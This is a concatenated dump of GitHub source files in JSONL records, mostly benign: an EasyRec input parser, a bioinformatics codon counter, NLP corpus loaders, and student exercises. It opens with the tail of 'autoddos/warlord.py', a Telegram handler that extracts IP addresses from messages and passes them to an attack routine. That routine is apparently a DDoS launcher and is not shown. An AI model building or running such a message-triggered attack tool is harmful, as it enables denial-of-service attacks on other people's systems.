@client.on(events.NewMessage(pattern=pattern))\n async def handler(event):\n # check whether the message contains any IP\n ips = re.compile(\n r'(\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})',\n re.M\n ).findall(event.message.message)\n if len(ips) == 0:\n return\n\n units = parser.msg_parse_units(event.message.message)\n await attack(units)\n\n await client.run_until_disconnected()\n\n\nasyncio.run(main())\n","repo_name":"Linguisto/autoddos","sub_path":"warlord.py","file_name":"warlord.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23562801101","text":"def is_increasing(num):\n num_list = list(str(num))\n return all(x<=y for x, y in zip(num_list, num_list[1:]))\n\nf = open('p2.small.in', 'r')\nnum_cases = int(f.readline())\nfor i in range(num_cases):\n num = int(f.readline())\n while not is_increasing(num):\n sub = num % 10\n num -= (sub + 1)\n print(\"Case #{}: {}\".format(i+1, num))\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/4847.py","file_name":"4847.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34626273389","text":"import logging\n\nimport tensorflow as tf\n\nfrom easy_rec.python.input.input import Input\nfrom easy_rec.python.ops.gen_str_avx_op import str_split_by_chr\nfrom easy_rec.python.utils.check_utils import check_split\nfrom easy_rec.python.utils.check_utils import check_string_to_number\nfrom easy_rec.python.utils.input_utils import string_to_number\nfrom easy_rec.python.utils.tf_utils import get_tf_type\n\nif tf.__version__ >= '2.0':\n tf = tf.compat.v1\n\n\nclass RTPInput(Input):\n \"\"\"RTPInput for parsing rtp fg new input format.\n\n Our new format(csv in csv) of rtp output:\n label0, item_id, ..., user_id, features\n here the separator(,) could be specified by data_config.rtp_separator\n For the feature column, features are separated by \u0002,\n multiple values of one feature are separated by \u0003, such as:\n ...\u000220\u0002beauty\u0003smart\u0002Paris\u0002...\n The features column and labels are specified by data_config.selected_cols,\n columns are selected by indices as our csv file has no header,\n such as: 0,1,4, means the 4th column is features, the 1st and 2nd\n columns are labels\n \"\"\"\n\n def __init__(self,\n data_config,\n feature_config,\n input_path,\n task_index=0,\n task_num=1,\n check_mode=False,\n pipeline_config=None):\n super(RTPInput,\n self).__init__(data_config, feature_config, input_path, task_index,\n task_num, check_mode, pipeline_config)\n logging.info('input_fields: %s label_fields: %s' %\n (','.join(self._input_fields), ','.join(self._label_fields)))\n self._rtp_separator = self._data_config.rtp_separator\n if not isinstance(self._rtp_separator, str):\n self._rtp_separator = self._rtp_separator.encode('utf-8')\n self._selected_cols = [\n int(x) for x in self._data_config.selected_cols.split(',')\n ]\n self._num_cols = -1\n self._feature_col_id = self._selected_cols[-1]\n logging.info('rtp separator = %s' % self._rtp_separator)\n\n def _parse_csv(self, line):\n record_defaults = ['' for i in range(self._num_cols)]\n\n # the actual features are in one single column\n record_defaults[self._feature_col_id] = self._data_config.separator.join([\n str(self.get_type_defaults(t, v))\n for x, t, v in zip(self._input_fields, self._input_field_types,\n self._input_field_defaults)\n if x not in self._label_fields\n ])\n\n check_list = [\n tf.py_func(\n check_split, [line, self._rtp_separator,\n len(record_defaults)],\n Tout=tf.bool)\n ] if self._check_mode else []\n with tf.control_dependencies(check_list):\n fields = tf.string_split(line, self._rtp_separator, skip_empty=False)\n\n fields = tf.reshape(fields.values, [-1, len(record_defaults)])\n\n labels = []\n for idx, x in enumerate(self._selected_cols[:-1]):\n field = fields[:, x]\n fname = self._input_fields[idx]\n ftype = self._input_field_types[idx]\n tf_type = get_tf_type(ftype)\n if field.dtype in [tf.string]:\n check_list = [\n tf.py_func(check_string_to_number, [field, fname], Tout=tf.bool)\n ] if self._check_mode else []\n with tf.control_dependencies(check_list):\n field = tf.string_to_number(field, tf_type)\n labels.append(field)\n\n # only for features, labels excluded\n record_types = [\n t for x, t in zip(self._input_fields, self._input_field_types)\n if x not in self._label_fields\n ]\n # assume that the last field is the generated feature column\n print('field_delim = %s' % self._data_config.separator)\n feature_str = fields[:, self._feature_col_id]\n check_list = [\n tf.py_func(\n check_split,\n [feature_str, self._data_config.separator,\n len(record_types)],\n Tout=tf.bool)\n ] if self._check_mode else []\n with tf.control_dependencies(check_list):\n fields = str_split_by_chr(\n feature_str, self._data_config.separator, skip_empty=False)\n tmp_fields = tf.reshape(fields.values, [-1, len(record_types)])\n rtp_record_defaults = [\n str(self.get_type_defaults(t, v))\n for x, t, v in zip(self._input_fields, self._input_field_types,\n self._input_field_defaults)\n if x not in self._label_fields\n ]\n fields = []\n for i in range(len(record_types)):\n field = string_to_number(tmp_fields[:, i], record_types[i],\n rtp_record_defaults[i], i)\n fields.append(field)\n\n field_keys = [x for x in self._input_fields if x not in self._label_fields]\n effective_fids = [field_keys.index(x) for x in self._effective_fields]\n inputs = {field_keys[x]: fields[x] for x in effective_fids}\n\n for x in range(len(self._label_fields)):\n inputs[self._label_fields[x]] = labels[x]\n return inputs\n\n def _build(self, mode, params):\n if type(self._input_path) != list:\n self._input_path = self._input_path.split(',')\n file_paths = []\n for x in self._input_path:\n file_paths.extend(tf.gfile.Glob(x))\n assert len(file_paths) > 0, 'match no files with %s' % self._input_path\n\n # try to figure out number of fields from one file\n with tf.gfile.GFile(file_paths[0], 'r') as fin:\n num_lines = 0\n for line_str in fin:\n line_tok = line_str.strip().split(self._rtp_separator)\n if self._num_cols != -1:\n assert self._num_cols == len(line_tok), \\\n 'num selected cols is %d, not equal to %d, current line is: %s, please check rtp_separator and data.' % \\\n (self._num_cols, len(line_tok), line_str)\n self._num_cols = len(line_tok)\n num_lines += 1\n if num_lines > 10:\n break\n logging.info('num selected cols = %d' % self._num_cols)\n\n record_defaults = [\n self.get_type_defaults(t, v)\n for x, t, v in zip(self._input_fields, self._input_field_types,\n self._input_field_defaults)\n if x in self._label_fields\n ]\n\n # the features are in one single column\n record_defaults.append(\n self._data_config.separator.join([\n str(self.get_type_defaults(t, v))\n for x, t, v in zip(self._input_fields, self._input_field_types,\n self._input_field_defaults)\n if x not in self._label_fields\n ]))\n\n num_parallel_calls = self._data_config.num_parallel_calls\n if mode == tf.estimator.ModeKeys.TRAIN:\n logging.info('train files[%d]: %s' %\n (len(file_paths), ','.join(file_paths)))\n dataset = tf.data.Dataset.from_tensor_slices(file_paths)\n\n if self._data_config.file_shard:\n dataset = self._safe_shard(dataset)\n\n if self._data_config.shuffle:\n # shuffle input files\n dataset = dataset.shuffle(len(file_paths))\n\n # too many readers read the same file will cause performance issues\n # as the same data will be read multiple times\n parallel_num = min(num_parallel_calls, len(file_paths))\n dataset = dataset.interleave(\n tf.data.TextLineDataset,\n cycle_length=parallel_num,\n num_parallel_calls=parallel_num)\n\n if not self._data_config.file_shard:\n dataset = self._safe_shard(dataset)\n\n if self._data_config.shuffle:\n dataset = dataset.shuffle(\n self._data_config.shuffle_buffer_size,\n seed=2020,\n reshuffle_each_iteration=True)\n dataset = dataset.repeat(self.num_epochs)\n else:\n logging.info('eval files[%d]: %s' %\n (len(file_paths), ','.join(file_paths)))\n dataset = tf.data.TextLineDataset(file_paths)\n dataset = dataset.repeat(1)\n\n dataset = dataset.batch(batch_size=self._data_config.batch_size)\n\n dataset = dataset.map(\n self._parse_csv,\n num_parallel_calls=self._data_config.num_parallel_calls)\n\n # preprocess is necessary to transform data\n # so that they could be feed into FeatureColumns\n dataset = dataset.map(\n map_func=self._preprocess,\n num_parallel_calls=self._data_config.num_parallel_calls)\n\n dataset = dataset.prefetch(buffer_size=self._prefetch_size)\n\n if mode != tf.estimator.ModeKeys.PREDICT:\n dataset = dataset.map(lambda x:\n (self._get_features(x), self._get_labels(x)))\n else:\n dataset = dataset.map(lambda x: (self._get_features(x)))\n return dataset\n","repo_name":"alibaba/EasyRec","sub_path":"easy_rec/python/input/rtp_input.py","file_name":"rtp_input.py","file_ext":"py","file_size_in_byte":8528,"program_lang":"python","lang":"en","doc_type":"code","stars":1284,"dataset":"github-code","pt":"61"} +{"seq_id":"41876654664","text":"from Bio import SeqIO\r\nrecord = SeqIO.read(\"data/bacterial4.fasta\", \"fasta\")\r\n\r\n#randa start ir stop kodonu indexus ir kodonu daznius\r\ndef readSequence(frame, seq, dictCodons, totalCodons):\r\n starts= []\r\n stops = []\r\n for i in range(frame, len(seq), 3):\r\n totalCodons += 1\r\n codon = record.seq[i:i+3]\r\n if codon == \"ATG\": #start kodonu indexai\r\n starts.append(i)\r\n if codon == \"TAG\" or codon == \"TAA\" or codon == \"TGA\": #stop kodonu indexai\r\n stops.append(i)\r\n if (len(codon)==3):\r\n if codon in dictCodons:\r\n dictCodons[codon] += 1\r\n else:\r\n dictCodons[codon] = 1\r\n return starts, stops, dictCodons, totalCodons\r\n\r\ndef readSequenceDicodons(frame, seq, dictDicodons, totalDicodons):\r\n for i in range(frame, len(seq), 6):\r\n totalDicodons += 1\r\n dicodon = record.seq[i:i+6]\r\n if (len(dicodon)==6):\r\n if dicodon in dictDicodons:\r\n dictDicodons[dicodon] += 1\r\n else:\r\n dictDicodons[dicodon] = 1\r\n return dictDicodons, totalDicodons\r\n\r\n#1. Pateiktoje sekoje surastu visas start ir stop kodonų poras, tarp kurių nebutu stop kodono\r\ndef findPairs(starts, stops):\r\n startStopPairs = []\r\n pairFound = False\r\n lastStopIndex = -1\r\n for startIndex in starts:\r\n pairFound = False\r\n for stopIndex in stops:\r\n if (startIndexlastStopIndex and stopIndex>lastStopIndex #2. Kiekvienam stop kodonui parinkti toliausiai nuo jo esanti start kodoną\r\n and stopIndex-startIndex>100): #3. Atfiltruokite visus fragmentus (\"tai butu baltymų koduojancios sekos\"), kurie trumpesni nei 100 simboliu.\r\n startStopPairs.append((startIndex,stopIndex))\r\n lastStopIndex = stopIndex\r\n pairFound = True\r\n return startStopPairs\r\n\r\n#5. Parasykite funkcijas, kurios ivertintu kodonu ir dikodonu daznius\r\ndef findFrequency(dictCodons, totalCodons, dictDicodons, totalDicodons):\r\n for codon in dictCodons:\r\n dictCodons[codon] = dictCodons[codon] / totalCodons\r\n for dicodon in dictDicodons:\r\n dictDicodons[dicodon] = dictDicodons[dicodon] / totalDicodons\r\n return dictCodons, dictDicodons\r\n\r\ntotalCodons = 0\r\ntotalDicodons = 0\r\ndictCodons = {}\r\ndictDicodons = {}\r\n# 6 skaitymo remeliai\r\nstarts1, stops1, dictCodons, totalCodons = readSequence(0,record.seq, dictCodons, totalCodons)\r\nstartStopPairs1 = findPairs(starts1, stops1)\r\ndictDicodons, totalDicodons = readSequenceDicodons(0, record.seq, dictDicodons, totalDicodons)\r\n\r\nstarts2, stops2, dictCodons, totalCodons = readSequence(1,record.seq, dictCodons, totalCodons)\r\nstartStopPairs2 = findPairs(starts2, stops2)\r\ndictDicodons, totalDicodons = readSequenceDicodons(1, record.seq, dictDicodons, totalDicodons)\r\n\r\nstarts3, stops3, dictCodons, totalCodons = readSequence(2,record.seq, dictCodons, totalCodons)\r\nstartStopPairs3 = findPairs(starts3, stops3)\r\ndictDicodons, totalDicodons = readSequenceDicodons(2, record.seq, dictDicodons, totalDicodons)\r\n\r\nstarts4, stops4, dictCodons, totalCodons = readSequence(0,record.seq.reverse_complement(), dictCodons, totalCodons)\r\nstartStopPairs4 = findPairs(starts4, stops4)\r\ndictDicodons, totalDicodons = readSequenceDicodons(0, record.seq.reverse_complement(), dictDicodons, totalDicodons)\r\n\r\nstarts5, stops5, dictCodons, totalCodons = readSequence(1,record.seq.reverse_complement(), dictCodons, totalCodons)\r\nstartStopPairs5 = findPairs(starts5, stops5)\r\ndictDicodons, totalDicodons = readSequenceDicodons(1, record.seq.reverse_complement(), dictDicodons, totalDicodons)\r\n\r\nstarts6, stops6, dictCodons, totalCodons = readSequence(2,record.seq.reverse_complement(), dictCodons, totalCodons)\r\nstartStopPairs6 = findPairs(starts6, stops6)\r\ndictDicodons, totalDicodons = readSequenceDicodons(2, record.seq.reverse_complement(), dictDicodons, totalDicodons)\r\n\r\ndictCodons, dictDicodons = findFrequency(dictCodons, totalCodons, dictDicodons, totalDicodons)\r\n\r\n# print frequencies to file (through terminal)\r\n# for codon in dictCodons:\r\n# print(codon, dictCodons[codon])\r\nfor dicodon in dictDicodons:\r\n print(dicodon, dictDicodons[dicodon])\r\n\r\n# (258, 780)\r\n# (300, 780) skip\r\n# (609, 780) skip\r\n# (612, 780) skip\r\n# (783, 2403)\r\n","repo_name":"sk057/BIOIT1","sub_path":"lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22381285793","text":"from collections import namedtuple\n\nimport numpy as np\nfrom sklearn import preprocessing\n\nInputTargetSequence = namedtuple('InputTargetSequence', 'input output')\n\n\nclass TextData:\n def __init__(self, filename):\n self.char_seq = list(self.load_text(filename))\n self.label_encoder = preprocessing.LabelBinarizer()\n self.enc_text = self.label_encoder.fit_transform(\n self.char_seq)\n self.tot_chars, self.num_classes = self.enc_text.shape\n\n def encode(self, *vals):\n if len(vals) == 1:\n return np.squeeze(self.label_encoder.transform(list(vals[0])))\n else:\n return [self.encode(s) for s in vals]\n\n def decode_to_strings(self, *seqs):\n if len(seqs) == 1:\n return ''.join(self.label_encoder.inverse_transform(seqs[0]))\n else:\n return [self.decode_to_strings(s) for s in seqs]\n\n def get_seqs(self, length=25):\n for i in range(0, self.tot_chars - length, length):\n yield InputTargetSequence(\n input=self.enc_text[i:i + length],\n output=self.enc_text[i + 1:i + length + 1]\n )\n\n @staticmethod\n def load_text(filename):\n with open(filename, 'r') as f:\n return f.read()\n","repo_name":"GustavHenning/DeepLearning18","sub_path":"lab4/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4925641761","text":"import boto3\n\ndef main():\n sqs_client = boto3.client('sqs', region_name='us-east-1')\n error_response = sqs_client.send_message(\n QueueUrl='https://sqs.us-east-1.amazonaws.com/637137674144/rf_ec2_errors',\n MessageBody='AIR/GROUND: air_or_ground.py returned a value other than \"air\" or \"ground\"')\n\nif __name__ == '__main__':\n main()\n","repo_name":"richiefoster/image_processing_app","sub_path":"air_or_ground_error.py","file_name":"air_or_ground_error.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10180454479","text":"# --------------------approach 1----------------------------------------\n'''\ninput array : arr1 = [1, 2, 3, 4,5, 6,7,8,9]\noutput pattern : [9,1,8,2,7,3,6,4,5]\n'''\n\narr = [1,2,3,4,5]\n\nmin_list = []\nmax_list = []\nmax_value = 0\nmin_value = 0\nmin_temp = []\nsum_max_list = 0\nsum_min_list = 0\n\nif len(arr) <= 5:\n for index, value in enumerate(arr):\n if value > max_value:\n max_value = value\n for index, value in enumerate(arr):\n if value < arr[index-1]:\n min_value = value\n\n for ele in arr:\n if ele< max_value:\n min_list.append(ele)\n\n for ele in arr:\n if ele>min_value:\n max_list.append(ele)\n\n for ele in min_list:\n sum_min_list = sum_min_list+ele\n\n for ele in max_list:\n sum_max_list = sum_max_list+ele\n\n print(str(sum_min_list)+\" \"+str(sum_max_list))\n\n\nprint('max value : ', max_value)\nprint('min value : ', min_value)\nprint('max value list : ', max_list)\nprint('min value list : ', min_list)\n\n'''\n# --------------------------------approach 2 ------------------------------------#\narr = [4,3,-5,-5,9]\nmax_value = 0\nmin_value = 0\nlist_of_sum_of_four_elements = []\ntemp1, temp2, temp3, temp4, temp5 = 0, 0, 0, 0, 0\nif len(arr) <= 5:\n for index, value in enumerate(arr):\n print(index, value)\n if index in [1,2,3,4] :\n temp1 = temp1+value\n\n if index in [0,2,3,4]:\n temp2 = temp2+value\n\n if index in [0,1,3,4]:\n temp3 = temp3+value\n\n if index in [0,1,2,4]:\n temp4 = temp4+value\n\n if index in [0,1,2,3]:\n temp5 = temp5+value\n\n\nlist_of_sum_of_four_elements.append(temp1)\nlist_of_sum_of_four_elements.append(temp2)\nlist_of_sum_of_four_elements.append(temp3)\nlist_of_sum_of_four_elements.append(temp4)\nlist_of_sum_of_four_elements.append(temp5)\nprint(list_of_sum_of_four_elements)\n\n# for index, value in enumerate(list_of_sum_of_four_elements):\n# if value > max_value:\n# max_value = value\n# for index, value in enumerate(list_of_sum_of_four_elements):\n# if value < list_of_sum_of_four_elements[-index]:\n# min_value = value\n\nprint(max(list_of_sum_of_four_elements), min(list_of_sum_of_four_elements))\n\n'''","repo_name":"amits0003/Selenium_Study_Files","sub_path":"problem_solving_section/find_minimum_maximum_by_adding_exactly_four_out_of_five_integers_in_array.py","file_name":"find_minimum_maximum_by_adding_exactly_four_out_of_five_integers_in_array.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37051133481","text":"import os\r\nimport re\r\nimport time\r\nimport gzip\r\nimport codecs\r\nimport _pickle as pickle\r\nfrom functools import reduce\r\n\r\nimport numpy as np\r\n\r\nfrom keras.preprocessing.sequence import pad_sequences \r\nfrom keras.utils.np_utils import to_categorical\r\n\r\ndef _to_categorical(num,max_num):\r\n\tarr = np.zeros((1,max_num),dtype=np.int8)\r\n\tarr[0][num] = 1\r\n\treturn arr[0]\r\n\t\r\ndef index2onehot(max_num):\r\n\tonehot = []\r\n\tfor num in range(max_num):\r\n\t\tarr = np.zeros(max_num,dtype=np.int8)\r\n\t\tarr[num] = 1\r\n\t\tonehot.append(arr)\r\n\treturn onehot\r\n\t\r\ndef index2categorical(labels,max_num):\r\n\tlabels = list(np.array(labels).flatten())\r\n\tnum_labels = len(labels)\r\n\tcategorical = []\r\n\tfor num in range(max_num):\r\n\t\tarr = np.zeros((1,max_num),dtype=np.float16) #np.int8\r\n\t\tarr[0][num] = labels.count(num)/num_labels #prior probability for each label \r\n\t\tif np.float16(arr[0][num]) < np.float16(1e-7):\r\n\t\t\tarr[0][num] = np.float16(1e-7)\r\n\t\t# uniform distribution?\r\n\t\tcategorical.append(arr[0])\r\n\treturn categorical\r\n\r\nclass Corpus(object):\r\n\t'''\r\n\tBuild train/dev/test data easily and quickly!\r\n\t'''\r\n\tdef __init__(self,path,word2vec_path=None,label_pattern='__label__[\\-\\w]+'):\r\n\t\tself.path = os.path.abspath(path)\r\n\t\tself.filename = os.path.basename(self.path).split('.')[0] \r\n\t\tself.label_pattern = label_pattern\r\n\t\tself.size = round(os.path.getsize(path)/(1024*1024*1024),2)\r\n\t\tself.texts = []\r\n\t\tself.max_text_length = 0\r\n\t\tself.labels = []\r\n\t\tself.word_index = {'__PADDING__':0}\r\n\t\tself.label_index = {}\r\n\t\tself.word2vec_path = word2vec_path\r\n\t\tself.multi_label = False\r\n\t\t\r\n\tdef preprocess(self):\r\n\t\tstart = time.time()\r\n\t\twith codecs.open(self.path,'r',encoding='utf-8') as f:\r\n\t\t\tfor line in f.readlines():\r\n\t\t\t\tline = line.strip()\r\n\t\t\t\tre_labels = re.findall(self.label_pattern,line)\r\n\t\t\t\ttext = re.sub(self.label_pattern,'',line)\r\n\t\t\t\t# if each line with multilabels\r\n\t\t\t\tif re_labels != None and len(re_labels) > 0:# for multilabel\r\n\t\t\t\t\tword_ids = []\r\n\t\t\t\t\tfor word in text.split(' '):#text preprocess\r\n\t\t\t\t\t\tif word not in self.word_index:\r\n\t\t\t\t\t\t\tword_id = len(self.word_index)\r\n\t\t\t\t\t\t\tself.word_index[word] = word_id\r\n\t\t\t\t\t\t\tword_ids.append(word_id)\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tword_ids.append(self.word_index[word])\r\n\t\t\t\t\tword_ids_length = len(word_ids)\r\n\t\t\t\t\tif word_ids_length > self.max_text_length:\r\n\t\t\t\t\t\tself.max_text_length = word_ids_length\r\n\t\t\t\t\tself.texts.append(word_ids)\r\n\t\t\t\t\tlabel_ids = []\r\n\t\t\t\t\tif len(re_labels) > 1 and self.multi_label == False:\r\n\t\t\t\t\t\tself.multi_label = True\r\n\t\t\t\t\tfor label in re_labels:\r\n\t\t\t\t\t\tif label not in self.label_index:\r\n\t\t\t\t\t\t\tlabel_id = len(self.label_index)\r\n\t\t\t\t\t\t\tself.label_index[label] = label_id\r\n\t\t\t\t\t\t\tlabel_ids.append(label_id)\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tlabel_ids.append(self.label_index[label])\r\n\t\t\t\t\tself.labels.append(label_ids)\r\n\t\tself.num_words = len(self.word_index)\r\n\t\tself.texts = np.array(pad_sequences(self.texts,\r\n\t\t\t\t\t\t\t\t maxlen=self.max_text_length,\r\n\t\t\t\t\t\t\t\t padding='post',\r\n\t\t\t\t\t\t\t\t truncating='post',\r\n\t\t\t\t\t\t\t\t value=0),dtype=np.int32)\r\n\t\tself.num_texts = len(self.texts)\r\n\t\tself.num_classes = len(self.label_index)\r\n\t\tif self.multi_label == True:\t\t#multi_label\r\n\t\t\t\tcategorical = index2categorical(self.labels,self.num_classes)\r\n\t\t\t\tfor index,label_ids in enumerate(self.labels):\r\n\t\t\t\t\tarr = sum([categorical[label_id] for label_id in label_ids])\r\n\t\t\t\t\tself.labels[index] = arr/arr.sum() #normalized\r\n\t\t\t\tself.labels = np.array(self.labels)\r\n\t\telse:\r\n\t\t\tonehot = index2onehot(self.num_classes)\r\n\t\t\tself.labels = np.array([onehot[label_ids[0]] for label_ids in self.labels])\r\n\t\t\t#self.labels = np.array([_to_categorical(label_ids[0],self.num_classes) for label_ids in self.labels])\r\n\t\tself.num_labels = len(self.labels)\r\n\t\tassert self.num_texts == self.num_labels\r\n\t\t# preprocess pretrained word2vec\r\n\t\tif not self.word2vec_path == None: \r\n\t\t\tself.embeddings_index = {}\r\n\t\t\tvectors = 0\r\n\t\t\twith codecs.open(self.word2vec_path,'r',encoding='utf-8') as f:\r\n\t\t\t\tf.readline()\r\n\t\t\t\twhile True:\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tline = f.readline()\r\n\t\t\t\t\t\tvalues = line.split()\r\n\t\t\t\t\t\tword = values[0]\r\n\t\t\t\t\t\tvectors = np.asarray(values[1:], dtype='float16')#float32\r\n\t\t\t\t\t\tself.embeddings_index[word] = vectors\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\tf.close()\r\n\t\t\tself.vector_dim = len(vectors)\r\n\t\t\tself.embedding_matrix = np.zeros((self.num_words + 1,self.vector_dim))\r\n\t\t\tfor word, index in self.word_index.items(): \r\n\t\t\t\tif word in self.embeddings_index: \r\n\t\t\t\t\tself.embedding_matrix[index] = self.embeddings_index[word]\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.embedding_matrix[index] = np.random.uniform(-1,1,size=(self.vector_dim)) #unlogin word \r\n\t\t\tself.num_embeddings = len(self.embeddings_index)\r\n\t\t\tself.embedding_matrix_shape =self.embedding_matrix.shape\r\n\t\telse:\r\n\t\t\tself.embedding_matrix = None\r\n\t\tself.preprocess_time = round(time.time() - start,2)\r\n\t\t\r\n\tdef summary(self):\r\n\t\tprint('path:'.ljust(18),self.path,\r\n\t\t\t '\\nfilename:'.ljust(18),self.filename,\r\n\t\t\t '\\nlabel_pattern:'.ljust(18),self.label_pattern,\r\n\t\t\t '\\nsize:'.ljust(18),'%sGB'%self.size,\r\n\t\t\t '\\nnum_texts:'.ljust(18),self.num_texts,\r\n\t\t\t '\\ntexts_shape:'.ljust(18),self.texts.shape,\r\n\t\t\t '\\nnum_labels:'.ljust(18),self.num_labels,\r\n\t\t\t '\\nlabels_shape:'.ljust(18),self.labels.shape,\r\n\t\t\t '\\nnum_words:'.ljust(18),self.num_words,\r\n\t\t\t '\\nnum_classes:'.ljust(18),self.num_classes,\r\n\t\t\t '\\nmulti_label:'.ljust(18),self.multi_label,\r\n\t\t\t '\\nmax_text_length:'.ljust(18),self.max_text_length,\r\n\t\t\t '\\npreprocess_time:'.ljust(18),'%ss'%self.preprocess_time\r\n\t\t\t )\r\n\t\tif not self.word2vec_path == None:\r\n\t\t\tprint('num_embeddings:'.ljust(18),self.num_embeddings,\r\n\t\t\t\t '\\nvector_dim:'.ljust(18),self.vector_dim,\r\n\t\t\t\t '\\nmatrix_shape:'.ljust(18),self.embedding_matrix_shape\r\n\t\t\t )\r\n\t\t\t \r\n\t@staticmethod\r\n\tdef dump(corpus):\r\n\t\tcorpus_object_path = os.path.join(os.path.dirname(corpus.path),\r\n\t\t\t\t\t\t\tcorpus.filename+'.'+corpus.__class__.__name__+'.pkl.gz')\r\n\t\twith gzip.open(corpus_object_path,'wb') as f:\r\n\t\t\tpickle.dump(corpus,f)\r\n\t\t\tprint(corpus_object_path,\r\n\t\t\t\t': %sGB'%round(os.path.getsize(corpus_object_path)/(1024*1024*1024),2))\r\n\t\t\t\t \r\n\t@staticmethod\r\n\tdef load(corpus_path):\r\n\t\tcorpus_path = os.path.abspath(corpus_path)\r\n\t\twith gzip.open(corpus_path,'rb') as f:\r\n\t\t\treturn pickle.load(f)\r\n\t\t\t\r\n\t@staticmethod\r\n\tdef test2corpus(corpus,test_path):\r\n\t\ttest = []\r\n\t\ttest_path = os.path.abspath(test_path)\r\n\t\twith codecs.open(test_path,'r',encoding='utf-8') as f:\r\n\t\t\tfor line in f.readlines():\r\n\t\t\t\tline = line.strip()\r\n\t\t\t\tword_ids = []\r\n\t\t\t\tfor word in line.split(' '):#text preprocess\r\n\t\t\t\t\tif word not in corpus.word_index:\r\n\t\t\t\t\t\tword_ids.append(0) #unlogin term 0\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tword_ids.append(corpus.word_index[word])\r\n\t\t\t\t# word_ids_length = len(word_ids)\r\n\t\t\t\t# if word_ids_length > corpus.max_text_length: # over length\r\n\t\t\t\t\t# word_ids = word_ids[:corpus.max_text_length]\r\n\t\t\t\ttest.append(word_ids)\r\n\t\ttest = np.array(pad_sequences(test,\r\n\t\t\t\t\t\t maxlen=corpus.max_text_length,\r\n\t\t\t\t\t\t padding='post',\r\n\t\t\t\t\t\t truncating='post',\r\n\t\t\t\t\t\t value=0),dtype=np.int32)\r\n\t\treturn test\r\n\t\t\r\n\t@staticmethod\r\n\tdef to_label(top,label_index):\r\n\t\tindex_label = dict(zip(label_index.values(),label_index.keys()))\r\n\t\tlabel = []\r\n\t\tfor label_ids in top:\r\n\t\t\tlabels = []\r\n\t\t\tfor label_id in label_ids:\r\n\t\t\t\tlabels.append(index_label[label_id])\r\n\t\t\tlabel.append(labels)\r\n\t\treturn label\r\n\t\r\n\t@classmethod\r\n\tdef transform(cls,corpus):\r\n\t\tcorpus.preprocess()\r\n\t\tcorpus.summary()\r\n\t\t#cls.dump(corpus)\r\n\t\t\r\ndef main():\r\n\tpass","repo_name":"lyfree132/text2class","sub_path":"corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":7490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12032853169","text":"import random\r\n\r\n\r\ndef high_low():\r\n count = 0\r\n a = random.randint(1, 9)\r\n user = int(input(\"Please enter a number from one to nine: \"))\r\n while True :\r\n#definitely can simplify the user input condition\r\n if user > a and user >= 1 and user <=9:\r\n print(\"Lower\")\r\n user = int(input(\"Please enter a different number: \"))\r\n count += 1\r\n elif user < a and user >= 1 and user <=9: \r\n print(\"Higher\")\r\n user = int(input(\"Please enter a different number: \"))\r\n count += 1\r\n elif user == a:\r\n print(\"You've won, you took\", count, \"try/tries to win!\")\r\n ans = input(\"Would you like to play again? Y/N\")\r\n if ans == \"y\":\r\n high_low()\r\n else:\r\n print(\"Thank you for playing!\")\r\n break\r\n# there seems to be a problem when you try to stop after playing multiple times\r\n else:\r\n user = int(input(\"Please enter a valid answer:\"))\r\n\r\n \r\nhigh_low()","repo_name":"tientea/Fun-exercises","sub_path":"highlow.py","file_name":"highlow.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43041919628","text":"#!/usr/bin/env python3\n\n\"\"\"\nAuthor:\n Kristján Eldjárn Hjörleifsson\n keldjarn@caltech.edu\n\nUsage:\n./extract_introns.py --gtf annotation.gtf3 --fa scaffolds.fasta -out output_directory [--union] [--diff]\n\n\"\"\"\n\nfrom operator import itemgetter\nfrom itertools import chain\nimport argparse\nimport gzip\n\nfrom utils import (reverse_complement, parse_rest, parse_fasta, collapse_N,\n merge_intervals, interval_diff)\n\ndef write_gene(gene, data, out):\n if len(data) == 0:\n return\n with open(path, 'a') as fh:\n fh.write(f'>{tr}\\n')\n fh.write(data)\n # fh.write('\\n'.join([data[i:i+80] for i in range(0, len(data), 80)]))\n fh.write('\\n')\n\ndef collapse_data(intervals, sequence, strand):\n data = ''.join(map(lambda iv: sequence[iv[0]:iv[1]], intervals))\n data = collapse_N(data.upper())\n if strand == '-':\n data = reverse_complement(data)\n return data\n\ndef process_gene(gene, scaffolds, out, nascent, mature):\n try:\n sequence = scaffolds[gene['scaffold']]\n except KeyError as _:\n print(f'Scaffold {gene[\"scaffold\"]} not found.')\n return\n\n print(f'processing {gene[\"name\"]}')\n\n if not nascent and not mature:\n nascent = True\n mature = True\n\n if nascent:\n # Find start of first exon and end of last exon in gene\n end = 0\n start = float('inf')\n for tr, data in gene['trs'].items():\n start = min(start, min(e['start'] for e in data['exons']))\n end = max(end, max(e['end'] for e in data['exons']))\n seq = sequence[start:end]\n header = f'>{gene[\"name\"]} nascent_transcript 